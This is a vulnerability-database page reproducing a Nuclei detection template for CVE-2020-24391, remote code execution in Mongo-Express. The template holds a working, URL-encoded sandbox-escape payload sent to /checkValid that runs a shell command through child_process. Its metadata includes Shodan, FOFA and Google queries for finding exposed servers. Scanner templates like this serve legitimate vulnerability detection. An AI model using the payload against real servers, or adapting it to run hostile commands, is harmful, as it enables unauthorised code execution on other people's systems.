Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-24391
HistoryJan 20, 2022 - 9:25 a.m.

Mongo-Express - Remote Code Execution

2022-01-2009:25:01
ProjectDiscovery
github.com
42
cve
cve2020
mongo
express
rce
intrusive
mongo-express_project
node.js
remote
execution
arbitrary
code
exploitation
vulnerability
security
patch
update
safer-eval
validation
javascript
sever
node
server
exploitation
system
patch
github
advisory
nvd
query-parser
kenzer-templates
bug
severity
cvss
patch
update
vendor
product
framework
shodan
fofa
google
information
security
document
description

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.479

Percentile

97.5%

Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.

id: CVE-2020-24391

info:
  name: Mongo-Express - Remote Code Execution
  author: leovalcante
  severity: critical
  description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
    - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24391
    - https://github.com/mongodb-js/query-parser/issues/16
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-24391
    epss-score: 0.55667
    epss-percentile: 0.97606
    cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 3
    vendor: mongo-express_project
    product: mongo-express
    framework: node.js
    shodan-query: http.title:"mongo express"
    fofa-query: title="mongo express"
    google-query: intitle:"mongo express"
  tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /checkValid HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
      - |
        GET /public/css/{{randstr}}.css HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
# digest: 490a00463044022071a22b59e3348ed8ba27141f47e9ae1bca53e0c6e6d939df8dce5209486e0f4002207ebb1c95c7da917ab83f9a3b538bd350070a303f44794d0f3076369ef950755e:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.479

Percentile

97.5%

Related for NUCLEI:CVE-2020-24391